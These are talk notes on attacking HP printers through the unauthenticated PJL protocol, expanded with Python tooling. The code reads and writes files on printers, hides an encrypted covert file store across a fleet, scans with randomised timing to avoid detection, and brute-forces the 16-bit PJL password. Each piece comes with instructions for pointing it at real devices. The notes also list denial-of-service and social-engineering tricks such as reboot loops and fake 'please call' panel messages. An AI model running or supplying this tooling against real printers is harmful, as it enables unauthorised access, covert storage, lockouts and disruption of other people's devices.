Printers Gone Wild!
Ben Smith
Printers are everywhere… they are ubiquitous!
Everybody seems to ignore them. They get plugged in, and just work!
HP Basics
Listens on tcp/9100
Admin page on 80/443
Many have hard disks!
HP printers have 3 passwords
- Web admin
- Telnet (same as the web admin)
- PJLPassword
The PJL password can be used to lock out the control panel, make disks read-only, etc.
The PJL password is weak: it is a 16-bit number (0-65535) and there is no brute-force protection
PJL is unauthenticated and widely supported; it is going away, but will be here for a while.
SNMP can be disabled through the web admin, but the printer will still answer SNMP-style (PML) requests that arrive over port 9100 if they are encoded specially, as PJL DMINFO ASCIIHEX
Google search “PJL DMINFO ASCIIHEX” for more info
Overview
PJL (Printer Job Language)
Sets up printer for jobs
Created by HP, used in many other devices
Really old!
Fun PJL commands
- FSUPLOAD (not an upload: it reads a file from the printer to the client)
- FSDOWNLOAD (not a download: it writes a file onto the printer)
- FSDIRLIST
- FSDELETE
- RDYMESSAGE
- DMINFO ASCIIHEX
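The commands above are plain text lines written to tcp/9100, wrapped in the UEL escape sequence. The following is an added example (not code from the talk or from pyPJL) that builds the file-system commands with the syntax from HP's PJL Technical Reference and parses the printer's replies; the two sample replies are constructed, not captured from a real device.

```python
import re

# Universal Exit Language: the escape sequence that switches the printer into PJL mode
UEL = b"\x1b%-12345X"


def pjl_cmd(line: str) -> bytes:
    """One PJL command line, e.g. pjl_cmd('INFO ID') -> b'@PJL INFO ID\\r\\n'."""
    return b"@PJL " + line.encode("ascii") + b"\r\n"


def pjl_frame(body: bytes) -> bytes:
    """Wrap raw PJL commands in UEL so they can be written straight to tcp/9100."""
    return UEL + b"@PJL\r\n" + body + UEL


def fsdirlist(path: str = "0:\\", entry: int = 1, count: int = 65535) -> bytes:
    return pjl_cmd(f'FSDIRLIST NAME="{path}" ENTRY={entry} COUNT={count}')


def fsupload(path: str, offset: int = 0, size: int = 2**31 - 1) -> bytes:
    # FSUPLOAD *reads* a file from the printer (the verb is from the printer's point of view)
    return pjl_cmd(f'FSUPLOAD FORMAT:BINARY NAME="{path}" OFFSET={offset} SIZE={size}')


def fsdownload(path: str, data: bytes) -> bytes:
    # FSDOWNLOAD *writes* data onto the printer; the raw bytes follow the command line
    return pjl_cmd(f'FSDOWNLOAD FORMAT:BINARY SIZE={len(data)} NAME="{path}"') + data


def fsdelete(path: str) -> bytes:
    return pjl_cmd(f'FSDELETE NAME="{path}"')


def rdymessage(text: str) -> bytes:
    # Replaces the "Ready" text on the control-panel LCD
    return pjl_cmd(f'RDYMESSAGE DISPLAY="{text}"')


# One directory entry of an FSDIRLIST reply: '<name> TYPE=DIR' or '<name> TYPE=FILE SIZE=<n>'
_ENTRY = re.compile(r'^(?P<name>.+?) TYPE=(?P<type>DIR|FILE)(?: SIZE=(?P<size>\d+))?$')


def parse_fsdirlist(resp: bytes) -> list:
    """Turn an FSDIRLIST reply into (name, type, size) tuples; the echoed header has no TYPE= and is skipped."""
    entries = []
    for line in resp.decode("latin-1").split("\r\n"):
        m = _ENTRY.match(line.strip("\x0c"))
        if m:
            entries.append((m["name"], m["type"], int(m["size"]) if m["size"] else None))
    return entries


def parse_fsupload(resp: bytes) -> bytes:
    """Extract the file bytes from an FSUPLOAD reply; raise on the printer's FILEERROR line."""
    header, _, rest = resp.partition(b"\r\n")
    if rest.startswith(b"FILEERROR"):
        raise OSError(rest.split(b"\r\n", 1)[0].decode("latin-1"))
    m = re.search(rb"SIZE=(\d+)", header)
    if not m:
        raise ValueError("not an FSUPLOAD reply: %r" % header)
    return rest[: int(m.group(1))]


# Constructed sample replies (not captured from a real printer)
SAMPLE_DIRLIST = (b'@PJL FSDIRLIST NAME="0:\\" ENTRY=1\r\n'
                  b'. TYPE=DIR\r\n.. TYPE=DIR\r\nwebServer TYPE=DIR\r\n'
                  b'secret.txt TYPE=FILE SIZE=42\r\n\x0c')
SAMPLE_UPLOAD = b'@PJL FSUPLOAD FORMAT:BINARY NAME="0:\\secret.txt" OFFSET=0 SIZE=5\r\nhello\x0c'

if __name__ == "__main__":
    print(pjl_frame(fsdirlist()))
    print(parse_fsdirlist(SAMPLE_DIRLIST))
    print(parse_fsupload(SAMPLE_UPLOAD))
```

To talk to a real device, open `socket.create_connection((host, 9100))`, send `pjl_frame(...)`, and read until the form feed (`\x0c`) that ends a PJL reply; the parsers above work on those bytes unchanged.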
There has been lots of research on this before (Hijetter, etc.)
printFS brings that into the modern environment
printFS
Python tool for covert file systems using HP printers
Distributes files over multiple printers
Uses the printer RAM disks or physical disks
Works on any supported printer via network or the internet!
All stored files are compressed/encrypted and saved using random filenames
All files are stored twice with different names and keys to improve redundancy (files in RAM disk are lost on restart)
Supports a panic mode: the panic command remotely reboots every device in the file table to destroy the data
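The storage scheme described in the list above, as an added example that is not the printFS code: each file is compressed, cut into chunks, and every chunk is stored twice under a random name with its own key, with the two copies placed on different printers; losing one printer's RAM disk still leaves a readable copy, and panic wipes everything the file table knows about. The RamDisk class is a constructed dict-backed stand-in for a printer (printFS would issue FSDOWNLOAD, FSUPLOAD and FSDELETE here), and the SHA-256 counter-mode keystream is a toy cipher chosen for this example, not whatever printFS actually uses.

```python
import hashlib
import secrets
import zlib


class RamDisk:
    """Constructed stand-in for one printer's RAM disk (a dict instead of PJL file commands)."""
    def __init__(self, name: str):
        self.name, self.files = name, {}

    def put(self, fname: str, data: bytes) -> None:
        self.files[fname] = data

    def get(self, fname: str):
        return self.files.get(fname)

    def reboot(self) -> None:
        self.files.clear()          # RAM-disk contents do not survive a restart


def keystream_xor(key: bytes, data: bytes) -> bytes:
    """Toy stream cipher: SHA-256 in counter mode XORed over the data. Symmetric, so it also
    decrypts. An assumption for this example only; use a real AEAD in anything serious."""
    stream = bytearray()
    counter = 0
    while len(stream) < len(data):
        stream += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


def random_name() -> str:
    return secrets.token_hex(4).upper() + ".TMP"     # random, spooler-looking filename


class PrintFS:
    """Compress, chunk, encrypt and spread each file over the fleet, storing every chunk
    `copies` times under different names and keys. Only the local table can reassemble it."""
    def __init__(self, printers, copies: int = 2):
        self.printers, self.copies, self.table = list(printers), copies, {}

    def store(self, name: str, data: bytes, chunk_size: int = 4096) -> None:
        blob = zlib.compress(data)
        chunks = [blob[i:i + chunk_size] for i in range(0, len(blob), chunk_size)]
        n = len(self.printers)
        entry = []
        for ci, chunk in enumerate(chunks):
            placements = []
            for c in range(self.copies):
                printer = self.printers[(ci + c) % n]   # copies of one chunk land on different printers
                key, fname = secrets.token_bytes(32), random_name()
                printer.put(fname, keystream_xor(key, chunk))
                placements.append((printer, fname, key))
            entry.append(placements)
        self.table[name] = entry

    def fetch(self, name: str) -> bytes:
        out = bytearray()
        for placements in self.table[name]:
            for printer, fname, key in placements:
                enc = printer.get(fname)
                if enc is not None:                     # first surviving copy wins
                    out += keystream_xor(key, enc)
                    break
            else:
                raise FileNotFoundError(f"{name}: every copy of a chunk is gone")
        return zlib.decompress(bytes(out))

    def panic(self) -> None:
        """Reboot every device in the file table so the RAM-disk copies vanish, then forget them."""
        for printer in {pr for entry in self.table.values() for pl in entry for pr, _, _ in pl}:
            printer.reboot()
        self.table.clear()


if __name__ == "__main__":
    a, b = RamDisk("printer-a"), RamDisk("printer-b")
    fs = PrintFS([a, b])
    fs.store("notes", b"meeting at 9, bring the drive\n" * 200)
    a.reboot()                                  # one printer restarts: the copy on b still works
    print(fs.fetch("notes")[:30])
    fs.panic()
```

Without the file table (names and keys) the printers hold nothing but random-looking TMP files, which is what makes the store covert; the table is the one thing the operator has to protect.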
pfsScanner
multithreaded scanner
Scans printers to see if necessary commands are supported to use printFS
Scans are randomized in the order that functions are run and the timing between them
Test upload files are random data and given random names
Entire scan peppered with random sleeps
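An added example (not the pfsScanner code) of the capability check described above: it writes a random test file under a random name, reads it back and deletes it, lists the directory, and asks for the printer ID, running the probes in a random order with a random pause before each. The printer here is a constructed in-memory stand-in; that it answers unsupported commands with "?" and missing files with FILEERROR is an assumption of this example, as is the set of commands it supports.

```python
import random
import re
import secrets
import time

UEL = b"\x1b%-12345X"


class FakePrinter:
    """Constructed stand-in for a printer on tcp/9100 (real use: socket.create_connection((host, 9100))).
    Assumed behaviour: '?' for unsupported commands, FILEERROR for a missing file."""
    def __init__(self, supports):
        self.supports, self.files = set(supports), {}

    def exchange(self, req: bytes) -> bytes:
        req = req.replace(UEL, b"")
        line, _, payload = req.partition(b"\r\n")
        verb = line.split()[1].decode("ascii")
        if verb not in self.supports:
            return b"?\r\n"
        m = re.search(rb'NAME="([^"]*)"', line)
        name = m.group(1) if m else b""
        if verb == "FSDOWNLOAD":
            self.files[name] = payload
            return b""
        if verb == "FSUPLOAD":
            if name not in self.files:
                return line + b"\r\nFILEERROR=3\r\n"
            return line + b"\r\n" + self.files[name]
        if verb == "FSDELETE":
            self.files.pop(name, None)
            return b""
        if verb == "FSDIRLIST":
            rows = b"".join(b"%s TYPE=FILE SIZE=%d\r\n" % (n.rsplit(b"\\", 1)[-1], len(d))
                            for n, d in self.files.items())
            return line + b"\r\n. TYPE=DIR\r\n" + rows
        return line + b"\r\nFAKE PRINTER\r\n"          # INFO ID


def _ok(resp: bytes) -> bool:
    return bool(resp) and not resp.startswith(b"?") and b"FILEERROR" not in resp


def probe_info(p) -> bool:
    return _ok(p.exchange(UEL + b"@PJL INFO ID\r\n" + UEL))


def probe_dirlist(p) -> bool:
    return _ok(p.exchange(UEL + b'@PJL FSDIRLIST NAME="0:\\" ENTRY=1 COUNT=1\r\n' + UEL))


def probe_roundtrip(p) -> bool:
    """Write random data under a random name, read it back, delete it: the minimum printFS needs."""
    name = b"0:\\" + secrets.token_hex(4).encode() + b".tmp"
    data = secrets.token_hex(32).encode()
    p.exchange(UEL + b'@PJL FSDOWNLOAD FORMAT:BINARY SIZE=%d NAME="%s"\r\n' % (len(data), name) + data + UEL)
    back = p.exchange(UEL + b'@PJL FSUPLOAD FORMAT:BINARY NAME="%s" OFFSET=0 SIZE=%d\r\n' % (name, len(data)) + UEL)
    p.exchange(UEL + b'@PJL FSDELETE NAME="%s"\r\n' % name + UEL)   # leave nothing behind
    return back.endswith(data)


def scan(printer, rng: random.Random, sleep=time.sleep, max_pause: float = 2.0) -> dict:
    """Run every probe in a random order with a random pause before each, breaking the fixed timing signature."""
    probes = [("INFO", probe_info), ("FSDIRLIST", probe_dirlist), ("FS roundtrip", probe_roundtrip)]
    rng.shuffle(probes)
    results = {}
    for label, fn in probes:
        sleep(rng.uniform(0, max_pause))
        results[label] = fn(printer)
    return results


if __name__ == "__main__":
    print(scan(FakePrinter({"INFO", "FSDIRLIST", "FSDOWNLOAD", "FSUPLOAD", "FSDELETE"}), random.Random()))
```

A printer passes when all three probes come back true; the test file is deleted whether or not the read-back succeeded, so a scan leaves no trace on the RAM disk even on a partially supported device.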
pyPJL
Main support lib
Used by all tools
Implements most of the documented PJL commands
printJack
A support tool for doing nasty, funny things
User interface to the PJL password cracker
Mass control panel lock/unlock
Mass RamDisk/Disk Lock/Unlock
Pass printing (toner is cheap!)
pyPJLpass
Support class for printjack
Brute-forces all 65,536 possible PJL password values in about 2 hours (single thread)
So now it is threaded to work on multiple printers at once; the workers share state and all stop as soon as one valid password is found (betting on password reuse across the fleet)
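The threaded search described above, as an added example that is not the pyPJLpass code: one 0-65535 keyspace is handed out pin by pin to a worker per printer, and the first hit anywhere stops every worker. The printer is a constructed stand-in; the assumption that a correct `@PJL JOB PASSWORD=n` lets the following `@PJL DEFAULT PASSWORD=0` clear the lock, and that `@PJL DINQUIRE PASSWORD` then reports DISABLED, is this example's model of the device, not a statement about any particular firmware.

```python
import threading

KEYSPACE = range(0, 65536)   # the PJL PASSWORD variable is a 16-bit number


class LockedPrinter:
    """Constructed stand-in for a PIN-locked printer on tcp/9100 (see the lead-in for the assumed behaviour)."""
    def __init__(self, pin: int):
        self.pin, self.attempts = pin, 0

    def exchange(self, job: bytes) -> bytes:
        authorized = False
        for line in job.split(b"\r\n"):
            if line.startswith(b"@PJL JOB PASSWORD="):
                self.attempts += 1
                authorized = int(line.rsplit(b"=", 1)[1]) == self.pin
            elif line == b"@PJL DEFAULT PASSWORD=0" and authorized:
                self.pin = 0                           # lock cleared
            elif line == b"@PJL DINQUIRE PASSWORD":
                state = b"DISABLED" if self.pin == 0 else b"ENABLED"
                return b"@PJL DINQUIRE PASSWORD\r\n" + state + b"\r\n\x0c"
        return b""


def try_pin(printer, pin: int) -> bool:
    """One attempt: open a job with the candidate PIN, try to clear the password, ask whether it is gone."""
    job = (b"@PJL JOB PASSWORD=%d\r\n@PJL DEFAULT PASSWORD=0\r\n@PJL EOJ\r\n"
           b"@PJL DINQUIRE PASSWORD\r\n" % pin)
    return b"DISABLED" in printer.exchange(job)


def crack_fleet(printers):
    """Split one keyspace across every printer; stop everything at the first hit.
    Returns (pin, printer) for the hit, or (None, None) if the whole space was exhausted."""
    pins = iter(KEYSPACE)
    lock, stop = threading.Lock(), threading.Event()
    found = {}

    def worker(printer):
        while not stop.is_set():
            with lock:                                 # each pin is handed to exactly one worker
                pin = next(pins, None)
            if pin is None:
                return
            if try_pin(printer, pin):
                found["pin"], found["printer"] = pin, printer
                stop.set()

    threads = [threading.Thread(target=worker, args=(p,)) for p in printers]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return found.get("pin"), found.get("printer")


if __name__ == "__main__":
    fleet = [LockedPrinter(4242) for _ in range(4)]   # constructed: four printers sharing one PIN
    pin, hit = crack_fleet(fleet)
    print("PIN", pin, "found on", fleet.index(hit), "after", sum(p.attempts for p in fleet), "attempts")
```

The 2-hour single-thread figure matches 65,536 attempts at roughly 0.11 s each; with N printers sharing one PIN the wall-clock time drops by about N. Against a real device, `printer.exchange` is a socket write of `\x1b%-12345X` + job + `\x1b%-12345X` followed by a read up to the form feed.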
Other fun stuff to do to PJL
- Mass reboot loop
- Mass connect to port 9100 and remain connected (blocking)
- Animated LCD messages
- Social-engineering LCD messages ("please call xxxxx")
- Mass disk lock
- Mass printing
- Mass control panel locking
Limitations
Can only upload files from the directory you are running printFS from
Known issue where some printers won’t respond to pfsScanner if they’re offline
To ensure that printers can still print while being scanned, a dynamic class is used (which generates huge traffic)
Code Release
Remote-exploit.org will receive it within the next week
Links:
- Shmoocon Schedule –> HERE
- Talk synopsis –> HERE
- HP PML faq –> HERE
old stuff
Talk at Defcon X ( 2003 !!!)
Slides
http://www.phenoelit-us.org/stuff/defconX.pdf
Tool
http://www.phenoelit-us.org/hp/docu.html